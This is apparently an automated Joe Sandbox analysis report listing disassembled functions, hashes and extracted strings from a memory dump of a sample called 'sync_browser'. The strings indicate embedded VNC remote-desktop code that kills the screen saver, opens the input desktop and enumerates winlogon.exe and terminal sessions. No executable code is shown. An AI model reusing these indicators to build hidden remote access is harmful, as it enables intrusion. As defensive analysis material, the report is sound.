                                                                      • String ID: SOFTWARE\Microsoft\Windows\CurrentVersion\Policies$SoftwareSASGeneration$System
                                                                      • API String ID: 1076069355-3579764778
                                                                      • Opcode ID: 87e8c0d61f37e34202edbdab6bff78c1ba5551bc53e556ab61ee4318769b540b
                                                                      • Instruction ID: e8c689a6fe36b7fa92b5e518ce4f40f2459e8b0111c426571a71becd4f5315f7
                                                                      • Opcode Fuzzy Hash: 87e8c0d61f37e34202edbdab6bff78c1ba5551bc53e556ab61ee4318769b540b
                                                                      • Instruction Fuzzy Hash: FD317576908B8686EB609B10F4657AAF3A0FBC8B54FC01136E68D86A58DF3CD105CF11
                                                                      Function 00007FF7E509F790 Relevance: 19.3, APIs: 7, Strings: 4, Instructions: 63windowCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000017.00000002.3170882784.00007FF7E5071000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7E5070000, based on PE: true
                                                                      • Associated: 00000017.00000002.3170856075.00007FF7E5070000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3170973291.00007FF7E5149000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171022945.00007FF7E517D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171045471.00007FF7E517F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E5180000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E51CB000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E51F8000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E5231000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E52A4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E52EC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_23_2_7ff7e5070000_sync_browser.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: Desktop$CloseEnumFindInfoMessageOpenParametersPostSystemVersionWindowWindows
                                                                      • String ID: Screen-saver$WindowsScreenSaverClass$vncdesktop.cpp : KillScreenSaver...$vncdesktop.cpp : Killing ScreenSaver
                                                                      • API String ID: 1547096108-1130181218
                                                                      • Opcode ID: 0218681f0ca0f0cb8045d3d881905bd2119dca5bb8d2230a423cfe654c101359
                                                                      • Instruction ID: aa33f64aaabef21b6a5a79f4853316e285069827ffe23aecb861492ef01f6bd4
                                                                      • Opcode Fuzzy Hash: 0218681f0ca0f0cb8045d3d881905bd2119dca5bb8d2230a423cfe654c101359
                                                                      • Instruction Fuzzy Hash: FF313725A1864A81F770BB25F871BBAA350FF84F44FC45137D90E82699DE3CE109C722
                                                                      Function 00007FF7E5074680 Relevance: 19.3, APIs: 6, Strings: 5, Instructions: 61libraryloaderCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000017.00000002.3170882784.00007FF7E5071000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7E5070000, based on PE: true
                                                                      • Associated: 00000017.00000002.3170856075.00007FF7E5070000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3170973291.00007FF7E5149000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171022945.00007FF7E517D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171045471.00007FF7E517F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E5180000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E51CB000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E51F8000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E5231000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E52A4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E52EC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_23_2_7ff7e5070000_sync_browser.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: AddressHandleModuleProc$CountCriticalInitializeSectionTick
                                                                      • String ID: 0$GetSystemTimes$NtQuerySystemInformation$kernel32.dll$ntdll.dll
                                                                      • API String ID: 649669561-4005017345
                                                                      • Opcode ID: 074b37e70411e8fa4c2f927709ee4b204295ab1398dd26aff7224720a389b37b
                                                                      • Instruction ID: 0073b30c3f40f907081a42692dc2356e3f1b6d5814f11fd4b7f12cf778ed9d77
                                                                      • Opcode Fuzzy Hash: 074b37e70411e8fa4c2f927709ee4b204295ab1398dd26aff7224720a389b37b
                                                                      • Instruction Fuzzy Hash: 83212A35A05B0A82EB14AF24F860369B3E0FF48F94F845136DA5D86398EF3CE454C761
                                                                      Function 00007FF7E5088090 Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 56synchronizationCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000017.00000002.3170882784.00007FF7E5071000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7E5070000, based on PE: true
                                                                      • Associated: 00000017.00000002.3170856075.00007FF7E5070000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3170973291.00007FF7E5149000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171022945.00007FF7E517D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171045471.00007FF7E517F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E5180000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E51CB000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E51F8000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E5231000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E52A4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E52EC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_23_2_7ff7e5070000_sync_browser.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: CriticalEventSection$EnterLeaveObjectResetSingleWait
                                                                      • String ID: c
                                                                      • API String ID: 295735435-112844655
                                                                      • Opcode ID: fa268cb6b2df6a727f3079fd17a88c909c0169f6597272d12e4c6e15257d5989
                                                                      • Instruction ID: bfc84554b5904840a6eec4b62de44ff4d175a5d7159de17c07bd58ed87b24bc1
                                                                      • Opcode Fuzzy Hash: fa268cb6b2df6a727f3079fd17a88c909c0169f6597272d12e4c6e15257d5989
                                                                      • Instruction Fuzzy Hash: 5821CF25618B4583DB20AB61F4641AAA370FB88F91F841032DB9E87669DF3CE445C761
                                                                      Function 00007FF7E50747C0 Relevance: 18.3, APIs: 12, Instructions: 288COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000017.00000002.3170882784.00007FF7E5071000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7E5070000, based on PE: true
                                                                      • Associated: 00000017.00000002.3170856075.00007FF7E5070000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3170973291.00007FF7E5149000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171022945.00007FF7E517D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171045471.00007FF7E517F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E5180000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E51CB000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E51F8000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E5231000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E52A4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E52EC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_23_2_7ff7e5070000_sync_browser.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: CriticalSection$CountEnterLeaveTick
                                                                      • String ID:
                                                                      • API String ID: 1056156058-0
                                                                      • Opcode ID: 4e1fcf1f9d5970b8c335a6cd4b3d0a08090c87295cd844a4afdb87dd54e77e75
                                                                      • Instruction ID: e95e40a042f01fc85dc62d32cdfd057f87e9e9383bd2a3c1c48ca4fd8c47df32
                                                                      • Opcode Fuzzy Hash: 4e1fcf1f9d5970b8c335a6cd4b3d0a08090c87295cd844a4afdb87dd54e77e75
                                                                      • Instruction Fuzzy Hash: 87D11936A09B4A95DB10EF69F4503A9B3E4FB44B88F845036EA4C83B58DF3CE415C761
                                                                      Function 00007FF7E5080760 Relevance: 18.2, APIs: 12, Instructions: 181COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000017.00000002.3170882784.00007FF7E5071000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7E5070000, based on PE: true
                                                                      • Associated: 00000017.00000002.3170856075.00007FF7E5070000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3170973291.00007FF7E5149000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171022945.00007FF7E517D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171045471.00007FF7E517F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E5180000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E51CB000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E51F8000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E5231000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E52A4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E52EC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_23_2_7ff7e5070000_sync_browser.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: Combine$DataDeleteObjectRegion$free
                                                                      • String ID:
                                                                      • API String ID: 1378972593-0
                                                                      • Opcode ID: cb15224673a3dfde0a5a84031da156aebc3bdcfdfc834712c68d2b408893385e
                                                                      • Instruction ID: daba4e8aa3c4e888048a3bd870a36b1bd1085e4b947949a63f3f35a840ccab1e
                                                                      • Opcode Fuzzy Hash: cb15224673a3dfde0a5a84031da156aebc3bdcfdfc834712c68d2b408893385e
                                                                      • Instruction Fuzzy Hash: A4719FB6604A8586EB50DF2AE460AA9F7A0FB48FD4B849032EF4D87754DF3DD581CB40
                                                                      Function 00007FF7E508DA10 Relevance: 18.1, APIs: 12, Instructions: 111COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000017.00000002.3170882784.00007FF7E5071000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7E5070000, based on PE: true
                                                                      • Associated: 00000017.00000002.3170856075.00007FF7E5070000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3170973291.00007FF7E5149000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171022945.00007FF7E517D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171045471.00007FF7E517F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E5180000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E51CB000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E51F8000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E5231000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E52A4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E52EC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_23_2_7ff7e5070000_sync_browser.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: DeleteObjectfree$CombineCriticalSection$CreateEnterLeaveRect
                                                                      • String ID:
                                                                      • API String ID: 707770685-0
                                                                      • Opcode ID: e8ce359a573d540e0fad56669d64a20bc3cc88b06a8798c1e7988a6509252d61
                                                                      • Instruction ID: fecbe8b0379f7c43ec33be63dd4bb29ee3add9f60c26e403389dc7f503b7ac14
                                                                      • Opcode Fuzzy Hash: e8ce359a573d540e0fad56669d64a20bc3cc88b06a8798c1e7988a6509252d61
                                                                      • Instruction Fuzzy Hash: 2A419222608B8586D750AF29E4A43A9B360FBC5FE0F841232EA5E877A9DF3CD444C711
                                                                      Function 00007FF7E50809E0 Relevance: 18.1, APIs: 12, Instructions: 97COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000017.00000002.3170882784.00007FF7E5071000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7E5070000, based on PE: true
                                                                      • Associated: 00000017.00000002.3170856075.00007FF7E5070000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3170973291.00007FF7E5149000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171022945.00007FF7E517D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171045471.00007FF7E517F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E5180000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E51CB000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E51F8000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E5231000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E52A4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E52EC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_23_2_7ff7e5070000_sync_browser.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: Combine$DeleteObjectfree$CreateRect
                                                                      • String ID:
                                                                      • API String ID: 3143477926-0
                                                                      • Opcode ID: 0a56b58438f5393381c87e283caa4a4dd7c9b87ade4efda876708c0d747ae0c3
                                                                      • Instruction ID: 5cf5a66d5806c2d45dafde14d4c80a8eb074e47a3950fecf70d18385e785d158
                                                                      • Opcode Fuzzy Hash: 0a56b58438f5393381c87e283caa4a4dd7c9b87ade4efda876708c0d747ae0c3
                                                                      • Instruction Fuzzy Hash: BC417C76608A8A82DA60EB16F4A496EB720FBC5FD4F805122EE4E87768DF3CD545C710
                                                                      Function 00007FF7E50755D0 Relevance: 18.0, APIs: 7, Strings: 5, Instructions: 48COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000017.00000002.3170882784.00007FF7E5071000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7E5070000, based on PE: true
                                                                      • Associated: 00000017.00000002.3170856075.00007FF7E5070000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3170973291.00007FF7E5149000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171022945.00007FF7E517D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171045471.00007FF7E517F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E5180000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E51CB000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E51F8000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E5231000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E52A4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E52EC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_23_2_7ff7e5070000_sync_browser.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: sprintf$CriticalInitializeSection$_errno_invalid_parameter_noinfo
                                                                      • String ID: 0.0.0$12-12-2002$Plugin.dsm$Someone$Unknown
                                                                      • API String ID: 524037307-261918508
                                                                      • Opcode ID: 4e3ff866f97a8194c4c278236100d924ee412cec83e3f0554b4225ebfdf1fe97
                                                                      • Instruction ID: 1d7e8d07b2937b4e61ccd052a26edc5f5de4e6923c185b04c89d72c4afdf424a
                                                                      • Opcode Fuzzy Hash: 4e3ff866f97a8194c4c278236100d924ee412cec83e3f0554b4225ebfdf1fe97
                                                                      • Instruction Fuzzy Hash: BB21DF76504B8691DB01EF24F9903E9B3ACFF54F88F885136DA4C4A6ADDF389295C321
                                                                      Function 00007FF7E5096A3E Relevance: 17.8, APIs: 6, Strings: 4, Instructions: 269COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000017.00000002.3170882784.00007FF7E5071000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7E5070000, based on PE: true
                                                                      • Associated: 00000017.00000002.3170856075.00007FF7E5070000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3170973291.00007FF7E5149000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171022945.00007FF7E517D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171045471.00007FF7E517F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E5180000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E51CB000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E51F8000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E5231000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E52A4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E52EC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_23_2_7ff7e5070000_sync_browser.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: Close$DesktopHandle$CriticalInputLeaveOpenSection
                                                                      • String ID: vncclient.cpp : vncClientThread $vncservice.cpp : OpenInputdesktop2 NULL$vncservice.cpp : OpenInputdesktop2 OK$vncservice.cpp : SelectDesktop
                                                                      • API String ID: 4065787043-3977938048
                                                                      • Opcode ID: 246573e72b9e964606911253f6d16abd29567e0b63f4d66f188770489fa65682
                                                                      • Instruction ID: 4ba29b6e2292a860b6d29a1f1c466ab0f7ca9d267332911be869be9a8ecf12b3
                                                                      • Opcode Fuzzy Hash: 246573e72b9e964606911253f6d16abd29567e0b63f4d66f188770489fa65682
                                                                      • Instruction Fuzzy Hash: 96E1C6326086C585E750AB39C4687BEA7A1FBC5F64F844236DA5C877E9CF38D440C722
                                                                      Function 00007FF7E5095709 Relevance: 17.8, APIs: 3, Strings: 7, Instructions: 264COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000017.00000002.3170882784.00007FF7E5071000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7E5070000, based on PE: true
                                                                      • Associated: 00000017.00000002.3170856075.00007FF7E5070000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3170973291.00007FF7E5149000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171022945.00007FF7E517D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171045471.00007FF7E517F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E5180000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E51CB000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E51F8000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E5231000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E52A4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E52EC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_23_2_7ff7e5070000_sync_browser.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: Desktop$CloseInputOpen
                                                                      • String ID: disabled$enabled$vncclient.cpp : rfbSetServerInput: inputs %s$vncclient.cpp : vncClientThread $vncservice.cpp : OpenInputdesktop2 NULL$vncservice.cpp : OpenInputdesktop2 OK$vncservice.cpp : SelectDesktop
                                                                      • API String ID: 1367241101-2270697846
                                                                      • Opcode ID: 1b183829833fec8f16a716ecdcb68095327f5337e21e681376bb5099e03e3359
                                                                      • Instruction ID: 0fbbcd557d01018afb62f34842c3588b9bd018e6eabd73fd84865fd5593302fc
                                                                      • Opcode Fuzzy Hash: 1b183829833fec8f16a716ecdcb68095327f5337e21e681376bb5099e03e3359
                                                                      • Instruction Fuzzy Hash: 91D1A422A086C585E751AB39C4687FDABA1FBC5F54F894032EA4C877A9CF38D445C722
                                                                      Function 00007FF7E5081A60 Relevance: 17.6, APIs: 6, Strings: 4, Instructions: 98libraryloaderCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000017.00000002.3170882784.00007FF7E5071000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7E5070000, based on PE: true
                                                                      • Associated: 00000017.00000002.3170856075.00007FF7E5070000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3170973291.00007FF7E5149000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171022945.00007FF7E517D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171045471.00007FF7E517F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E5180000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E51CB000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E51F8000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E5231000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E52A4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E52EC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_23_2_7ff7e5070000_sync_browser.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: Library$AddressFreeLoadProc
                                                                      • String ID: WTSEnumerateProcessesA$WTSFreeMemory$winlogon.exe$wtsapi32
                                                                      • API String ID: 145871493-4162899161
                                                                      • Opcode ID: 0adbf5e9dd7c30560f15780b9e5a176f1c63490ee2f09b9478d032169a347fac
                                                                      • Instruction ID: c8a94a4f26c618f608bbc749e7b83b0e3ff3db0ee86c6271d1176f29d2cdafa8
                                                                      • Opcode Fuzzy Hash: 0adbf5e9dd7c30560f15780b9e5a176f1c63490ee2f09b9478d032169a347fac
                                                                      • Instruction Fuzzy Hash: EA41B332609B8A86E660AF15F4503A9B3A0FF85FA0F884136DD5D87754EF3CD445C711
                                                                      Function 00007FF7E5082520 Relevance: 17.6, APIs: 6, Strings: 4, Instructions: 97libraryloaderCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000017.00000002.3170882784.00007FF7E5071000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7E5070000, based on PE: true
                                                                      • Associated: 00000017.00000002.3170856075.00007FF7E5070000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3170973291.00007FF7E5149000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171022945.00007FF7E517D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171045471.00007FF7E517F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E5180000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E51CB000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E51F8000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E5231000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E52A4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E52EC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_23_2_7ff7e5070000_sync_browser.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: Library$AddressFreeLoadProc
                                                                      • String ID: Console$WTSEnumerateSessionsA$WTSFreeMemory$wtsapi32
                                                                      • API String ID: 145871493-4083478734
                                                                      • Opcode ID: 6cf080f84c71be26cb1bfa4edcfbd06d998d32083e0e310b716d811f44676067
                                                                      • Instruction ID: 3c47889d69afb3679f0cb89fe9edb1640297d864fc6453271283abdd115835c4
                                                                      • Opcode Fuzzy Hash: 6cf080f84c71be26cb1bfa4edcfbd06d998d32083e0e310b716d811f44676067
                                                                      • Instruction Fuzzy Hash: C1418121A09B4B86E660EF25F86076AE2A0FF45F90F880136D95D87394EF3CE454C721
                                                                      Function 00007FF7E50A0700 Relevance: 17.5, APIs: 9, Strings: 1, Instructions: 49threadsleepsynchronizationCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000017.00000002.3170882784.00007FF7E5071000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7E5070000, based on PE: true
                                                                      • Associated: 00000017.00000002.3170856075.00007FF7E5070000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3170973291.00007FF7E5149000.00000002.00000001.01000000.00000007.sdmpDownload File
